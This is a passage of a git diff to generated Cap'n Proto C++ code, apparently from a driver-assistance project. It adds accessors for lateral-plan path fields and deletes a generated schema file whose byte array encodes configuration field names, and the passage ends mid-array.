::cereal::LongitudinalPlanExt::LongitudinalPlanExtSource value) { + _builder.setDataField< ::cereal::LongitudinalPlanExt::LongitudinalPlanExtSource>( + ::capnp::bounded<19>() * ::capnp::ELEMENTS, value); +} + +inline bool LateralPlanExt::Reader::hasDPathWLinesX() const { + return !_reader.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); +} +inline bool LateralPlanExt::Builder::hasDPathWLinesX() { + return !_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); +} +inline ::capnp::List::Reader LateralPlanExt::Reader::getDPathWLinesX() const { + return ::capnp::_::PointerHelpers< ::capnp::List>::get(_reader.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS)); +} +inline ::capnp::List::Builder LateralPlanExt::Builder::getDPathWLinesX() { + return ::capnp::_::PointerHelpers< ::capnp::List>::get(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS)); +} +inline void LateralPlanExt::Builder::setDPathWLinesX( ::capnp::List::Reader value) { + ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS), value); +} +inline void LateralPlanExt::Builder::setDPathWLinesX(::kj::ArrayPtr value) { + ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS), value); +} +inline ::capnp::List::Builder LateralPlanExt::Builder::initDPathWLinesX(unsigned int size) { + return ::capnp::_::PointerHelpers< ::capnp::List>::init(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS), size); +} +inline void LateralPlanExt::Builder::adoptDPathWLinesX( + ::capnp::Orphan< ::capnp::List>&& value) { + ::capnp::_::PointerHelpers< ::capnp::List>::adopt(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS), kj::mv(value)); +} +inline ::capnp::Orphan< ::capnp::List> LateralPlanExt::Builder::disownDPathWLinesX() { + return ::capnp::_::PointerHelpers< ::capnp::List>::disown(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS)); +} + +inline bool LateralPlanExt::Reader::hasDPathWLinesY() const { + return !_reader.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS).isNull(); +} +inline bool LateralPlanExt::Builder::hasDPathWLinesY() { + return !_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS).isNull(); +} +inline ::capnp::List::Reader LateralPlanExt::Reader::getDPathWLinesY() const { + return ::capnp::_::PointerHelpers< ::capnp::List>::get(_reader.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS)); +} +inline ::capnp::List::Builder LateralPlanExt::Builder::getDPathWLinesY() { + return ::capnp::_::PointerHelpers< ::capnp::List>::get(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS)); +} +inline void LateralPlanExt::Builder::setDPathWLinesY( ::capnp::List::Reader value) { + ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS), value); +} +inline void LateralPlanExt::Builder::setDPathWLinesY(::kj::ArrayPtr value) { + ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS), value); +} +inline ::capnp::List::Builder LateralPlanExt::Builder::initDPathWLinesY(unsigned int size) { + return ::capnp::_::PointerHelpers< ::capnp::List>::init(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS), size); +} +inline void LateralPlanExt::Builder::adoptDPathWLinesY( + ::capnp::Orphan< ::capnp::List>&& value) { + ::capnp::_::PointerHelpers< ::capnp::List>::adopt(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS), kj::mv(value)); +} +inline ::capnp::Orphan< ::capnp::List> LateralPlanExt::Builder::disownDPathWLinesY() { + return ::capnp::_::PointerHelpers< ::capnp::List>::disown(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS)); +} + } // namespace diff --git a/cereal/gen/cpp/dp.capnp.c++ b/cereal/gen/cpp/dp.capnp.c++ deleted file mode 100644 index 1d5d7f533..000000000 --- a/cereal/gen/cpp/dp.capnp.c++ +++ /dev/null @@ -1,877 +0,0 @@ -// Generated by Cap'n Proto compiler, DO NOT EDIT -// source: dp.capnp - -#include "dp.capnp.h" - -namespace capnp { -namespace schemas { -static const ::capnp::_::AlignedData<841> b_84e5d575c3177d12 = { - { 0, 0, 0, 0, 5, 0, 6, 0, - 18, 125, 23, 195, 117, 213, 229, 132, - 9, 0, 0, 0, 1, 0, 3, 0, - 199, 64, 100, 72, 69, 230, 167, 191, - 2, 0, 7, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 21, 0, 0, 0, 162, 0, 0, 0, - 29, 0, 0, 0, 7, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 25, 0, 0, 0, 247, 10, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 46, 99, 97, 112, 110, 112, - 58, 68, 114, 97, 103, 111, 110, 67, - 111, 110, 102, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 1, 0, 1, 0, - 200, 0, 0, 0, 3, 0, 4, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 1, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 105, 5, 0, 0, 50, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 5, 0, 0, 3, 0, 1, 0, - 112, 5, 0, 0, 2, 0, 1, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 1, 0, 1, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 5, 0, 0, 3, 0, 1, 0, - 120, 5, 0, 0, 2, 0, 1, 0, - 2, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 2, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 117, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 5, 0, 0, 3, 0, 1, 0, - 128, 5, 0, 0, 2, 0, 1, 0, - 3, 0, 0, 0, 2, 0, 0, 0, - 0, 0, 1, 0, 3, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 125, 5, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 124, 5, 0, 0, 3, 0, 1, 0, - 136, 5, 0, 0, 2, 0, 1, 0, - 4, 0, 0, 0, 3, 0, 0, 0, - 0, 0, 1, 0, 4, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 133, 5, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 132, 5, 0, 0, 3, 0, 1, 0, - 144, 5, 0, 0, 2, 0, 1, 0, - 5, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 5, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 141, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 140, 5, 0, 0, 3, 0, 1, 0, - 152, 5, 0, 0, 2, 0, 1, 0, - 6, 0, 0, 0, 64, 0, 0, 0, - 0, 0, 1, 0, 6, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 149, 5, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 152, 5, 0, 0, 3, 0, 1, 0, - 164, 5, 0, 0, 2, 0, 1, 0, - 7, 0, 0, 0, 9, 0, 0, 0, - 0, 0, 1, 0, 7, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 161, 5, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 164, 5, 0, 0, 3, 0, 1, 0, - 176, 5, 0, 0, 2, 0, 1, 0, - 8, 0, 0, 0, 10, 0, 0, 0, - 0, 0, 1, 0, 8, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 173, 5, 0, 0, 162, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 176, 5, 0, 0, 3, 0, 1, 0, - 188, 5, 0, 0, 2, 0, 1, 0, - 9, 0, 0, 0, 65, 0, 0, 0, - 0, 0, 1, 0, 9, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 185, 5, 0, 0, 210, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 192, 5, 0, 0, 3, 0, 1, 0, - 204, 5, 0, 0, 2, 0, 1, 0, - 10, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 10, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 201, 5, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 200, 5, 0, 0, 3, 0, 1, 0, - 212, 5, 0, 0, 2, 0, 1, 0, - 11, 0, 0, 0, 66, 0, 0, 0, - 0, 0, 1, 0, 11, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 209, 5, 0, 0, 66, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 204, 5, 0, 0, 3, 0, 1, 0, - 216, 5, 0, 0, 2, 0, 1, 0, - 12, 0, 0, 0, 67, 0, 0, 0, - 0, 0, 1, 0, 12, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 213, 5, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 212, 5, 0, 0, 3, 0, 1, 0, - 224, 5, 0, 0, 2, 0, 1, 0, - 13, 0, 0, 0, 11, 0, 0, 0, - 0, 0, 1, 0, 13, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 221, 5, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 220, 5, 0, 0, 3, 0, 1, 0, - 232, 5, 0, 0, 2, 0, 1, 0, - 14, 0, 0, 0, 12, 0, 0, 0, - 0, 0, 1, 0, 14, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 229, 5, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 228, 5, 0, 0, 3, 0, 1, 0, - 240, 5, 0, 0, 2, 0, 1, 0, - 15, 0, 0, 0, 68, 0, 0, 0, - 0, 0, 1, 0, 15, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 237, 5, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 236, 5, 0, 0, 3, 0, 1, 0, - 248, 5, 0, 0, 2, 0, 1, 0, - 16, 0, 0, 0, 69, 0, 0, 0, - 0, 0, 1, 0, 16, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 245, 5, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 244, 5, 0, 0, 3, 0, 1, 0, - 0, 6, 0, 0, 2, 0, 1, 0, - 17, 0, 0, 0, 70, 0, 0, 0, - 0, 0, 1, 0, 17, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 253, 5, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 252, 5, 0, 0, 3, 0, 1, 0, - 8, 6, 0, 0, 2, 0, 1, 0, - 18, 0, 0, 0, 71, 0, 0, 0, - 0, 0, 1, 0, 18, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 6, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 4, 6, 0, 0, 3, 0, 1, 0, - 16, 6, 0, 0, 2, 0, 1, 0, - 19, 0, 0, 0, 104, 0, 0, 0, - 0, 0, 1, 0, 19, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 13, 6, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 6, 0, 0, 3, 0, 1, 0, - 24, 6, 0, 0, 2, 0, 1, 0, - 20, 0, 0, 0, 105, 0, 0, 0, - 0, 0, 1, 0, 20, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 21, 6, 0, 0, 98, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 20, 6, 0, 0, 3, 0, 1, 0, - 32, 6, 0, 0, 2, 0, 1, 0, - 21, 0, 0, 0, 106, 0, 0, 0, - 0, 0, 1, 0, 21, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 29, 6, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 28, 6, 0, 0, 3, 0, 1, 0, - 40, 6, 0, 0, 2, 0, 1, 0, - 22, 0, 0, 0, 107, 0, 0, 0, - 0, 0, 1, 0, 22, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 37, 6, 0, 0, 98, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 36, 6, 0, 0, 3, 0, 1, 0, - 48, 6, 0, 0, 2, 0, 1, 0, - 23, 0, 0, 0, 108, 0, 0, 0, - 0, 0, 1, 0, 23, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 45, 6, 0, 0, 98, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 44, 6, 0, 0, 3, 0, 1, 0, - 56, 6, 0, 0, 2, 0, 1, 0, - 24, 0, 0, 0, 109, 0, 0, 0, - 0, 0, 1, 0, 24, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 53, 6, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 56, 6, 0, 0, 3, 0, 1, 0, - 68, 6, 0, 0, 2, 0, 1, 0, - 25, 0, 0, 0, 14, 0, 0, 0, - 0, 0, 1, 0, 25, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 65, 6, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 64, 6, 0, 0, 3, 0, 1, 0, - 76, 6, 0, 0, 2, 0, 1, 0, - 26, 0, 0, 0, 110, 0, 0, 0, - 0, 0, 1, 0, 26, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 73, 6, 0, 0, 186, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 76, 6, 0, 0, 3, 0, 1, 0, - 88, 6, 0, 0, 2, 0, 1, 0, - 27, 0, 0, 0, 15, 0, 0, 0, - 0, 0, 1, 0, 27, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 85, 6, 0, 0, 226, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 92, 6, 0, 0, 3, 0, 1, 0, - 104, 6, 0, 0, 2, 0, 1, 0, - 28, 0, 0, 0, 111, 0, 0, 0, - 0, 0, 1, 0, 28, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 101, 6, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 104, 6, 0, 0, 3, 0, 1, 0, - 116, 6, 0, 0, 2, 0, 1, 0, - 29, 0, 0, 0, 128, 0, 0, 0, - 0, 0, 1, 0, 29, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 113, 6, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 6, 0, 0, 3, 0, 1, 0, - 128, 6, 0, 0, 2, 0, 1, 0, - 30, 0, 0, 0, 129, 0, 0, 0, - 0, 0, 1, 0, 30, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 125, 6, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 128, 6, 0, 0, 3, 0, 1, 0, - 140, 6, 0, 0, 2, 0, 1, 0, - 31, 0, 0, 0, 130, 0, 0, 0, - 0, 0, 1, 0, 31, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 137, 6, 0, 0, 58, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 132, 6, 0, 0, 3, 0, 1, 0, - 144, 6, 0, 0, 2, 0, 1, 0, - 32, 0, 0, 0, 131, 0, 0, 0, - 0, 0, 1, 0, 32, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 141, 6, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 140, 6, 0, 0, 3, 0, 1, 0, - 152, 6, 0, 0, 2, 0, 1, 0, - 33, 0, 0, 0, 132, 0, 0, 0, - 0, 0, 1, 0, 33, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 149, 6, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 148, 6, 0, 0, 3, 0, 1, 0, - 160, 6, 0, 0, 2, 0, 1, 0, - 34, 0, 0, 0, 133, 0, 0, 0, - 0, 0, 1, 0, 34, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 157, 6, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 160, 6, 0, 0, 3, 0, 1, 0, - 172, 6, 0, 0, 2, 0, 1, 0, - 35, 0, 0, 0, 134, 0, 0, 0, - 0, 0, 1, 0, 35, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 169, 6, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 168, 6, 0, 0, 3, 0, 1, 0, - 180, 6, 0, 0, 2, 0, 1, 0, - 36, 0, 0, 0, 135, 0, 0, 0, - 0, 0, 1, 0, 36, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 177, 6, 0, 0, 186, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 180, 6, 0, 0, 3, 0, 1, 0, - 192, 6, 0, 0, 2, 0, 1, 0, - 37, 0, 0, 0, 17, 0, 0, 0, - 0, 0, 1, 0, 37, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 189, 6, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 192, 6, 0, 0, 3, 0, 1, 0, - 204, 6, 0, 0, 2, 0, 1, 0, - 38, 0, 0, 0, 144, 0, 0, 0, - 0, 0, 1, 0, 38, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 201, 6, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 200, 6, 0, 0, 3, 0, 1, 0, - 212, 6, 0, 0, 2, 0, 1, 0, - 39, 0, 0, 0, 19, 0, 0, 0, - 0, 0, 1, 0, 39, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 209, 6, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 212, 6, 0, 0, 3, 0, 1, 0, - 224, 6, 0, 0, 2, 0, 1, 0, - 40, 0, 0, 0, 20, 0, 0, 0, - 0, 0, 1, 0, 40, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 221, 6, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 224, 6, 0, 0, 3, 0, 1, 0, - 236, 6, 0, 0, 2, 0, 1, 0, - 41, 0, 0, 0, 145, 0, 0, 0, - 0, 0, 1, 0, 41, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 233, 6, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 236, 6, 0, 0, 3, 0, 1, 0, - 248, 6, 0, 0, 2, 0, 1, 0, - 42, 0, 0, 0, 21, 0, 0, 0, - 0, 0, 1, 0, 42, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 245, 6, 0, 0, 202, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 252, 6, 0, 0, 3, 0, 1, 0, - 8, 7, 0, 0, 2, 0, 1, 0, - 43, 0, 0, 0, 22, 0, 0, 0, - 0, 0, 1, 0, 43, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 7, 0, 0, 186, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 8, 7, 0, 0, 3, 0, 1, 0, - 20, 7, 0, 0, 2, 0, 1, 0, - 44, 0, 0, 0, 146, 0, 0, 0, - 0, 0, 1, 0, 44, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 17, 7, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 20, 7, 0, 0, 3, 0, 1, 0, - 32, 7, 0, 0, 2, 0, 1, 0, - 45, 0, 0, 0, 147, 0, 0, 0, - 0, 0, 1, 0, 45, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 29, 7, 0, 0, 194, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 32, 7, 0, 0, 3, 0, 1, 0, - 44, 7, 0, 0, 2, 0, 1, 0, - 46, 0, 0, 0, 148, 0, 0, 0, - 0, 0, 1, 0, 46, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 41, 7, 0, 0, 194, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 44, 7, 0, 0, 3, 0, 1, 0, - 56, 7, 0, 0, 2, 0, 1, 0, - 47, 0, 0, 0, 149, 0, 0, 0, - 0, 0, 1, 0, 47, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 53, 7, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 56, 7, 0, 0, 3, 0, 1, 0, - 68, 7, 0, 0, 2, 0, 1, 0, - 48, 0, 0, 0, 23, 0, 0, 0, - 0, 0, 1, 0, 48, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 65, 7, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 68, 7, 0, 0, 3, 0, 1, 0, - 80, 7, 0, 0, 2, 0, 1, 0, - 49, 0, 0, 0, 150, 0, 0, 0, - 0, 0, 1, 0, 49, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 77, 7, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 80, 7, 0, 0, 3, 0, 1, 0, - 92, 7, 0, 0, 2, 0, 1, 0, - 100, 112, 65, 116, 108, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 111, 99, 97, 108, 101, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 77, 111, 100, 101, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 99, 77, 105, 110, 77, - 112, 104, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 99, 65, 117, 116, 111, - 77, 105, 110, 77, 112, 104, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 99, 65, 117, 116, 111, - 68, 101, 108, 97, 121, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 76, 97, 110, 101, 108, 105, 110, - 101, 115, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 67, 97, 109, 101, 114, 97, 79, - 102, 102, 115, 101, 116, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 80, 97, 116, 104, 79, 102, 102, - 115, 101, 116, 0, 0, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 82, 111, 97, 100, 69, 100, 103, - 101, 68, 101, 116, 101, 99, 116, 101, - 100, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 73, 112, 65, 100, 100, 114, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 84, 111, 112, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 83, 105, 100, 101, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 66, 114, 105, 103, - 104, 116, 110, 101, 115, 115, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 68, 105, 115, 112, - 108, 97, 121, 77, 111, 100, 101, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 83, 112, 101, 101, - 100, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 